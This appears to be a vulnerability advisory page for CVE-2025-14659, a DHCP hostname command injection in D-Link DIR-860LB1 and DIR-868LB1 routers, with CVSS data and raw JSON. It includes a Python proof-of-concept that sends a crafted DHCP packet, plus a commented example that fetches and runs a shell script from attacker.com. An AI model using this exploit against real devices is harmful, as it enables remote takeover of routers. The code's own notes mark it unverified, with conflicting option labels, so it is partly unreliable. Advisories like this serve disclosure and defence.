Security Vulnerability Report
CVE-2025-14659 CVSS 8.8 HIGH

CVE-2025-14659

Published: 2025-12-14 12:16:02
Last Modified: 2026-03-08 01:22:02

Description

A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. The manipulation of the argument Hostname results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
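CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: the 8.8 score and vector shown here are the record's Secondary CVSS 3.1 assessment (PR:L). The raw JSON below also carries a Primary CVSS 3.1 assessment of 9.8 CRITICAL with PR:N (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).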

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-868l_b1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-868l_b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dlink:dir-860l_b1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-860l_b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
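D-Link DIR-860LB1 <= v203b03 (inclusive; the raw record uses versionEndIncluding 203b03)
D-Link DIR-868LB1 <= v203b01 (inclusive; the raw record uses versionEndIncluding 203b01)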

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct

# CVE-2025-14659 PoC - DHCP Hostname Command Injection
# Target: D-Link DIR-860LB1/DIR-868LB1
#
# NOTE(review): this listing is unverified against the advisory. For defenders
# the relevant signal is a DHCP request whose option value carries shell
# metacharacters (the wrapper below uses ';' and '#'); the root cause named in
# the advisory is the DHCP daemon handing the client-supplied Hostname to a
# shell command without validation.


def create_dhcp_packet(hostname):
    """Build a BOOTP/DHCP request carrying *hostname* in a single option.

    The result is the fixed BOOTP header (236 bytes, all addresses zeroed),
    the DHCP magic cookie, one option holding ``hostname`` and the end
    option.

    The option's length byte is ``len(hostname)`` (the character count, not
    the encoded byte count), so ``bytes([...])`` raises ``ValueError`` for
    strings longer than 255 characters.
    """
    fixed_header = [
        b'\x01',              # Message type: BOOTREQUEST
        b'\x01',              # Hardware type: Ethernet
        b'\x06',              # Hardware address length
        b'\x00',              # Hops
        b'\x39\x05\x03\x00',  # Transaction ID
        b'\x00\x00',          # Seconds elapsed
        b'\x00\x00',          # Flags
        b'\x00\x00\x00\x00',  # Ciaddr (Client IP)
        b'\x00\x00\x00\x00',  # Yiaddr (Your IP)
        b'\x00\x00\x00\x00',  # Siaddr (Server IP)
        b'\x00\x00\x00\x00',  # Giaddr (Relay IP)
        b'\x00' * 16,         # Client hardware address
        b'\x00' * 64,         # Server host name
        b'\x00' * 128,        # Boot file name
        b'\x63\x82\x53\x63',  # Magic cookie
    ]

    # NOTE(review): the source listing labels this option both as
    # "Option 12: Host Name" and as "Option 60: Vendor class identifier";
    # the two labels disagree and the listing has not been verified.
    option_block = [
        b'\x3c',                  # Option code byte
        bytes([len(hostname)]),   # Option length
        hostname.encode(),        # Option value
        b'\xff',                  # End option
    ]

    return b''.join(fixed_header + option_block)


def exploit(target_ip, malicious_hostname):
    """Send one crafted DHCP datagram to *target_ip* on UDP port 67.

    ``malicious_hostname`` is wrapped as ``;<value>;#`` before being placed
    in the packet; those shell metacharacters are what a DHCP daemon must
    reject or escape before using a client-supplied name in a command.
    """
    # Inject command via Hostname option
    wrapped = f';{malicious_hostname};#'
    datagram = create_dhcp_packet(wrapped)

    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    udp.sendto(datagram, (target_ip, 67))
    udp.close()

    print(f'Exploit sent to {target_ip}')


# Example usage: Execute reverse shell
# exploit('192.168.0.1', 'wget http://attacker.com/shell.sh && sh shell.sh')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14659", "sourceIdentifier": "[email protected]", "published": "2025-12-14T12:16:02.343", "lastModified": "2026-03-08T01:22:01.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. The manipulation of the argument Hostname results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-868l_b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "203b01", "matchCriteriaId": "B085C315-2915-45E4-9602-350211612F10"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-868l_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DBAAA87-BE50-4587-A1A9-D6E246A4CDBA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-860l_b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "203b03", "matchCriteriaId": "95ABC77A-C5D9-475F-B205-BBA09C82F1CF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-860l_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "A347FCD4-4A9E-4EE0-BE45-A916B2504F7B"}]}]}], "references": [{"url": "https://tzh00203.notion.site/D-Link-DIR-860LB1-v203b03-Command-Injection-in-DHCPd-2c6b5c52018a807eab1ae73dbd95eee3?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Mitigatio ... (truncated)